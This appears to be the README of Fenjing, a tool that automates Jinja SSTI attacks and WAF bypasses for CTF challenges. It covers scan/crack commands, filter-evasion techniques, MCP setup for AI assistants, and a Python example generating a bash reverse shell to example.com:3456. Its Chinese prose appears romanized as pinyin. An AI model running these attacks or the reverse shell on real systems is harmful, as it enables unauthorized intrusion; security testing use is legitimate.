Bypass the WAF without knowing WAF
Fen Jing Shi Yi Ge Zhen Dui CTFBi Sai Zhong Jinja SSTIRao Guo WAFDe Quan Zi Dong Jiao Ben ,Ke Yi Zi Dong Gong Ji Gei Ding De Wang Zhan Huo Jie Kou ,Sheng Qu Shou Dong Ce Shi Jie Kou ,fuzzTi Mu WAFDe Shi Jian .
Yan Shi
Zhu Yao Te Xing
- Ji Cheng Liao Da Bu Fen CTFZhong De SSTI WAFRao Guo Ji Qiao
- Quan Zi Dong Bao Po APICan Shu Bing Gong Ji
- Quan Zi Dong Fen Xi Wang Zhan De WAFBing Sheng Cheng Xiang Ying De payload
- Zhi Chi Gong Ji Dui Ying De HTMLBiao Dan Huo HTTPLu Jing
- Zhi Chi Jiang payloadFang Jin GETCan Shu Zhong Ti Jiao ,You Xiao Jiang Di payloadChang Du
- Zi Dong Jian Ce Guan Jian Zi Ti Huan Bing Rao Guo
- ......
An Zhuang
Zai Yi Xia Fang Fa Zhong Xuan Ze Yi Chong
Shi Yong pipxAn Zhuang Yun Xing (Tui Jian )
#pip install pipx
# Ran Hou Yong pipxZi Dong Chuang Jian Du Li De Xu Ni Huan Jing Bing Jin Xing An Zhuang
pipx install fenjing
fenjing webui
# fenjing scan --url 'http://xxxx:xxx'
Shi Yong pipAn Zhuang Yun Xing
fenjing webui
# fenjing scan --url 'http://xxxx:xxx'
Xia Zai Bing Yun Xing dockerJing Xiang
Shi Yong
webui
Ke Yi Zhi Jie Shu Ru python -m fenjing webuiQi Dong webui,Zhi Ding Can Shu Bing Zi Dong Gong Ji
Zai Zuo Bian Tian Ru Can Shu Bing Dian Ji Kai Shi Fen Xi ,Ran Hou Zai You Bian Shu Ru Ming Ling Ji Ke
scan
Zai Zhong Duan Ke Yi Yong scanGong Neng ,Cai Ce Mou Ge Ye Mian De Can Shu Bing Zi Dong Gong Ji :
python -m fenjing scan --url 'http://xxxx:xxx/yyy'
crack
Ye Ke Yi Yong crackGong Neng ,Shou Dong Zhi Ding Can Shu Jin Xing Gong Ji :
python -m fenjing crack --url 'http://xxxx:xxx/yyy' --detect-mode fast --inputs aaa,bbb --method GET
Zhe Li Ti Gong Liao aaaHe bbbLiang Ge Can Shu Jin Xing Gong Ji ,Bing Shi Yong --detect-mode fastJia Su Gong Ji Su Du
crack-request
Huan Ke Yi Jiang HTTPQing Qiu Xie Jin Yi Ge Wen Ben Wen Jian Li (Bi Ru Shuo req.txt)Ran Hou Jin Xing Gong Ji
Wen Ben Wen Jian Nei Rong Ru Xia :
Host: 127.0.0.1:5000
Connection: close
Ming Ling Ru Xia :
python -m fenjing crack-request -f req.txt --host '127.0.0.1' --port 5000
crack-keywords
Ru Guo Yi Jing Na Dao Liao Fu Wu Duan Yuan Ma app.pyDe Hua ,Ke Yi Zi Dong Ti Qu Dai Ma Zhong De Lie Biao Zuo Wei Hei Ming Dan Sheng Cheng Dui Ying De payload
Ming Ling Ru Xia :
python -m fenjing crack-keywords -k app.py -c 'ls /'
Qi Ta
Ci Wai Huan Zhi Chi Jie Shou JSONDe API,Yi Ji Gen Ju Gei Ding Guan Jian Zi Sheng Cheng payloadDe Yong Fa ,Xiang Jian examples.md
Xiang Xi Shi Yong He Yi Nan Jie Da
Jian examples.mdYi Ji --helpXuan Xiang
Ji Zhu Xi Jie
Xiang Mu Jie Gou Ru Xia :
payloadSheng Cheng Yuan Li Jian howitworks.md
Zhi Chi De Rao Guo Gui Ze Ru Xia
Guan Jian Zi Fu Rao Guo :
'He"_[- Jue Da Duo Shu Min Gan Guan Jian Zi
- Ren Yi A La Bo Shu Zi
+-*~{{%- ...
Zi Ran Shu Rao Guo :
Zhi Chi Rao Guo 0-9De Tong Shi Rao Guo Jia Jian Cheng Chu ,Zhi Chi De Fang Fa Ru Xia :
- Shi Liu Jin Zhi
- a*b+c
(39,39,20)|sum(x,x,x)|length- unicodeZhong De Quan Jiao Zi Fu Deng
'%c'Rao Guo :
Zhi Chi Rao Guo Yin Hao ,g,lipsumHe urlencodeDeng
Xia Hua Xian Rao Guo :
Zhi Chi (lipsum|escape|batch(22)|list|first|last)Deng
- Qi Zhong De Shu Zi 22Zhi Chi Shang Mian De Shu Zi Rao Guo
Ren Yi Zi Fu Chuan :
Zhi Chi Rao Guo Yin Hao ,Ren Yi Zi Fu Chuan Pin Jie Fu Hao ,Xia Hua Xian He Ren Yi Guan Jian Ci
Zhi Chi Yi Xia Xing Shi
'str'"str""\x61\x61\x61"dict(__class__=x)|join- Qi Zhong De Xia Hua Xian Zhi Chi Rao Guo
'%c'*3%(97,97, 97)- Qi Zhong De
'%c'Ye Zhi Chi Shang Mian De'%c'Rao Guo - Qi Zhong De Suo You Shu Zi Du Zhi Chi Shang Mian De Shu Zi Rao Guo
- Qi Zhong De
- Jiang Zi Fu Chuan Qie Fen Cheng Xiao Duan Fen Bie Sheng Cheng
- ...
Shu Xing :
['aaa'].aaa|attr('aaa')
Item
['aaa'].aaa.__getitem__('aaa')
Qi Ta Ji Zhu Xi Jie
- Jiao Ben Hui Ti Qian Sheng Cheng Yi Xie Zi Fu Chuan Bing Shi Yong
{%set %}She Zhi Zai Qian Fang - Jiao Ben Hui Zai payloadDe Qian Fang She Zhi Yi Xie Bian Liang Ti Gong Gei payloadHou Bu Fen De Biao Da Shi .
- Jiao Ben Hui Zai Quan Zi Dong De Qian Ti Xia Sheng Cheng Jiao Duan De Biao Da Shi .
- Jiao Ben Hui Zi Xi Di Jian Cha Ge Ge Biao Da Shi De You Xian Ji ,Jin Liang Bi Mian Sheng Cheng Duo Yu De Gua Hao .
Xiang Xi Shi Yong
Zuo Wei Ming Ling Xing Jiao Ben Shi Yong
Ge Ge Gong Neng De Jie Shao :
- webui: Wang Ye UI
- Gu Ming Si Yi ,Wang Ye UI
- Mo Ren Duan Kou 11451
- scan: Sao Miao Zheng Ge Wang Zhan
- Cong Wang Zhan Zhong Gen Ju formYuan Su Ti Qu Chu Suo You De Biao Dan Bing Gong Ji
- Gen Ju Gei Ding URLBao Po Can Shu ,Yi Ji Ti Qu Qi Ta URLJin Xing Sao Miao
- Sao Miao Cheng Gong Hou Hui Ti Gong Yi Ge Mo Ni Zhong Duan Huo Zhi Xing Gei Ding De Ming Ling
- Shi Li :
python -m fenjing scan --url 'http://xxx/'
- crack: Dui Mou Ge Te Ding De Biao Dan Jin Xing Gong Ji
- Xu Yao Zhi Ding Biao Dan De url, action(GETHuo POST)Yi Ji Suo You Zi Duan (Bi Ru 'name')
- Gong Ji Cheng Gong Hou Ye Hui Ti Gong Yi Ge Mo Ni Zhong Duan Huo Zhi Xing Gei Ding De Ming Ling
- Shi Li :
python -m fenjing crack --url 'http://xxx/' --method GET --inputs name
- crack-path: Dui Mou Ge Te Ding De Lu Jing Jin Xing Gong Ji
- Gong Ji Mou Ge Lu Jing (Ru
http://xxx.xxx/hello/)Cun Zai De Lou Dong - Can Shu Da Zhi Shang He crackXiang Tong ,Dan Shi Zhi Xu Yao Ti Gong Dui Ying De Lu Jing
- Shi Li :
python -m fenjing crack-path --url 'http://xxx/hello/'
- Gong Ji Mou Ge Lu Jing (Ru
- crack-request: Du Qu Mou Ge Qing Qiu Wen Jian Jin Xing Gong Ji
- Du Qu Wen Jian Li De Qing Qiu ,Jiang Qi Zhong De
PAYLOADTi Huan Cheng Shi Ji De payloadRan Hou Ti Jiao - Gen Ju HTTPGe Shi Hui Mo Ren Dui Qing Qiu Jin Xing urlencode, Ke Yi Shi Yong
--urlencode-payload 0Guan Bi
- Du Qu Wen Jian Li De Qing Qiu ,Jiang Qi Zhong De
- crack-json: Gong Ji Zhi Ding De JSON API
- Dang Yi Ge APIDe bodyGe Shi Wei JSONShi Gong Ji Zhe Ge JSONZhong De Mou Ge Jian
- Shi Li :
python -m fenjing crack-json --url 'http://127.0.0.1:5000/crackjson' --json-data '{"name": "admin", "age": 24, "msg": ""}' --key msg
- crack-keywords: Du Qu Wen Jian Zhong De Suo You Guan Jian Zi Bing Gong Ji
- Cong .txt, .pyHuo Zhe .jsonWen Jian Zhong Du Qu Suo You Guan Jian Zi ,Dui Gei Ding De shellZhi Ling Sheng Cheng Dui Ying De payload
- Shi Li :
python -m fenjing crack-keywords -k waf.json -o payload.jinja2 --command 'ls /'
Yi Xie Te Shu De Xuan Xiang :
--eval-args-payload:Jiang payloadFang Zai GETCan Shu xZhong Ti Jiao--detect-mode:Jian Ce Mo Shi ,Ke Wei accurateHuo fast--environment:Zhi Ding Mo Ban De Xuan Ran Huan Jing ,Mo Ren Ren Wei Mo Ban Zai flaskZhong Derender_template_stringZhong Xuan Ran--tamper-cmd:Zai payloadFa Chu Qian Bian Ma- Li Ru :
--tamper-cmd 'rev':Jiang payloadFan Zhuan Hou Zai Fa Chu--tamper-cmd 'base64':Jiang payloadJin Xing base64Bian Ma Hou Fa Chu--tamper-cmd 'base64 | rev':Jiang payloadJin Xing base64Bian Ma Bing Fan Zhuan Hou Zai Fa Chu
- Li Ru :
- Xiang Xi Jie Shi Jian examples.md
MCPFu Wu Qi Zhi Chi
Fen Jing Zhi Chi Tong Guo Model Context Protocol(MCP)Zuo Wei Wai Bu Fu Wu Ti Gong Gei AIZhu Shou Shi Yong .
Pei Zhi Fang Fa
Zai MCPKe Hu Duan Pei Zhi Wen Jian Zhong Tian Jia Yi Xia Pei Zhi (Li Ru OpenCodeDe opencode.jsonc):
"mcp": {
"fenjing": {
"type": "local",
"command": ["fenjing", "mcp"],
"enabled": true
}
}
}
Pei Zhi Wan Cheng Hou ,AIZhu Shou Ji Ke Tong Guo Fen Jing Jin Xing SSTILou Dong Jian Ce He Gong Ji .
Zuo Wei pythonKu Shi Yong
Can Kao example.py
import logging
logging.basicConfig(level = logging.INFO)
def waf(s: str):
blacklist = [
"config", "self", "g", "os", "class", "length", "mro", "base", "lipsum",
"[", '"', "'", "_", ".", "+", "~", "{{",
"0", "1", "2", "3", "4", "5", "6", "7", "8", "9",
"0","1","2","3","4","5","6","7","8","9"
]
return all(word not in s for word in blacklist)
if __name__ == "__main__":
shell_payload, _ = exec_cmd_payload(waf, "bash -c \"bash -i >& /dev/tcp/example.com/3456 0>&1\"")
config_payload = config_payload(waf)
print(f"{shell_payload=}")
print(f"{config_payload=}")
Qi Ta Shi Yong Li Ke Yi Kan Zhe Li
Juan Zeng
| Ri Qi | Jin E | Ping Tai | Bei Zhu ID | Bei Zhu |
|---|---|---|---|---|
| 20250407 | Y=20 | Wei Xin | ||
| 20250703 | Y=18.88 | Wei Xin | Jia You ! | |
| 20251110 | Y=50 | Wei Xin |